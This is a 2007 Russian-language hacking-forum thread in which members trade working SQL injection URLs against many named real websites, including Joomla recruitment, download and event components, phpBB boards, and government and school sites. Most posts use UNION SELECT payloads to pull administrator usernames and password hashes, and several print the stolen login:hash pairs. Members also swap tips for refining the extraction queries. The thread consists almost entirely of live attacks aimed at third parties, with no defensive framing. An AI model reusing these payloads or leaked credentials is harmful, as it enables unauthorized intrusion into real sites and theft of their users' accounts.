HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2921  
Старый 23.08.2007, 20:09
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию

Цитата:
Сообщение от fobofob  
походу тут интересно,жаль я не очень пока разбираюсь что с этим дальше делать

код:

http;//www.webmarket.mobi/ wm.php?id=-3+unio n+select+1 ,column_ name ,3 ,4 ,5 , 6+from+informatio n_schema.col umns/*

Делай вот так
Цитата:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,column_name,TABLE_NAME,4,5,6+from +information_schema.columns/*
тут тебе показано,какие таблицы и где находятся...

Странно Can't select from table:



Цитата:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,admin_login,admin_password,4,5,6+ from+admin_settings/*
вот что то есть

Код:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,logn,pasw,4,u_id,6+from+users3/*

Последний раз редактировалось Nazaret2005; 23.08.2007 в 20:19..
 
Ответить с цитированием

  #2922  
Старый 23.08.2007, 20:16
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Nazaret2005  
Делай вот так

тут тебе показано,какие таблицы и где находятся...

Странно Can't select from table:
Ты бы лучше не советы давал, а мануалы почитал бы:

Код:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(concat(admin_login,char(58),admin_password),0x71),0x71),3,4,5,6+from+admin_settings/*
 
Ответить с цитированием

  #2923  
Старый 23.08.2007, 21:21
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.intergy.ca/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),userna
me,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0
,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=86
admin:c74c6ca9af4e07d395d15bdd461c1985

Код:
http://www.administrationnetwork.ca/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,
101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,
333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=36
admin:53f580fcae1d2f3ffa1cbbb4493b5142

Код:
http://www.recruitingsales.com/index.php?option=com_neorecruit&task=offer_vie
w&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,5
8),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,
444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=26
admin:93e3b04e8c37f439047122606d4b8e56

Код:
http://www.femstudent.nl/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=33
admin:14aeedbb91b2674adfae0c33edb93f3b

Код:
http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=27
rhcomm:dde29cf6540fb2d19735874bbe1b075d:nZU2ch2im8 VZIWVd

Код:
http://www.coordination-nationale-infirmiere.org/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=98
adminsjuilla:6e2f7fa24b775562fc88d8f9a5d76573

Код:
http://www.nounouchelanou.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=18
admin:6d9556fe5e923f525bd376b5269318b4

Код:
http://www.dentalservicesagency.ie/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=26
admin:b664b357e56de3ceb408cec88e646247

Код:
http://www.utahstateonline.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=29
hankhill:1e8e222a26a62564a467499b0e12e94e
 
Ответить с цитированием

  #2924  
Старый 23.08.2007, 21:41
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.symbianone.com/index.php?option=com_remository&Itemid=75&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*
Код:
http://www.lbszone.com/index.php?option=com_remository&Itemid=28&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*
Код:
http://www.plogue.com/index.php?option=com_remository&Itemid=31&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*
Код:
http://www.gisuser.com/index.php?option=com_remository&Itemid=105&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*
Код:
http://www.chernozemie-inteko.ru/index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*&Itemid=77
Код:
http://www.mrtt.pmis.gov.mn/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=45
Код:
http://farmmonitordb.net/cms/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=26
Код:
http://www.vanbuurenestates.co.za/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=89
Код:
http://www.savingbaily.com/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=34
 
Ответить с цитированием

  #2925  
Старый 23.08.2007, 21:41
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию

http://www.thehopeless.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1

Дальше сами копайте ))
 
Ответить с цитированием

  #2926  
Старый 23.08.2007, 21:43
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от Grey  
Ты бы лучше не советы давал, а мануалы почитал бы:

Код:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(concat(admin_login,char(58),admin_password),0x71),0x71),3,4,5,6+from+admin_settings/*
а можно еще и так
Код:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,convert(concat(admin_login,char(58),admin_password),binary),3,4,5,6+from+admin_settings/*
 
Ответить с цитированием

  #2927  
Старый 23.08.2007, 21:53
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.vortex-club.com/cms/index.php?option=com_eventlist&Itemid=99999999&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
admin:2c019e4d345e0e2693af848183c8654a

Код:
http://www.rabota.su/info/makebiz/index.php?id=-1+union+select+user(),2/*
Код:
http://www.clubtour.su/tourinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

sql
  #2928  
Старый 23.08.2007, 22:18
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Цитата:
Сообщение от Ded MustD!e  
Код:
http://www.rabota.su/info/makebiz/index.php?id=-1+union+select+user(),2/*
вот нормальный вывод
Цитата:
http://www.rabota.su/employer/search_results.php?direct=-2065+union+select+concat_ws(0x3a,user_id,username, user_password,user_level)+from+phpbb_users+where+u ser_level=1+limit+0,1/*
 
Ответить с цитированием

  #2929  
Старый 23.08.2007, 23:43
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.st-johns-school.org.uk/index.php?inc=999+union+select+1,2,3,database(),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Что-то старею что-ли, но таблицу подобрать не могу... НЕЛР

Кстати такая бага встречается во многих сайтах, типа из бд выбирается имя файла, и инъекция)))
 
Ответить с цитированием

  #2930  
Старый 24.08.2007, 01:11
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.lrvk.gov.lv/page.php?id=-1+union+select+1,2,3,4,username,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users/*
admin:6cb062ad1d75b703
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ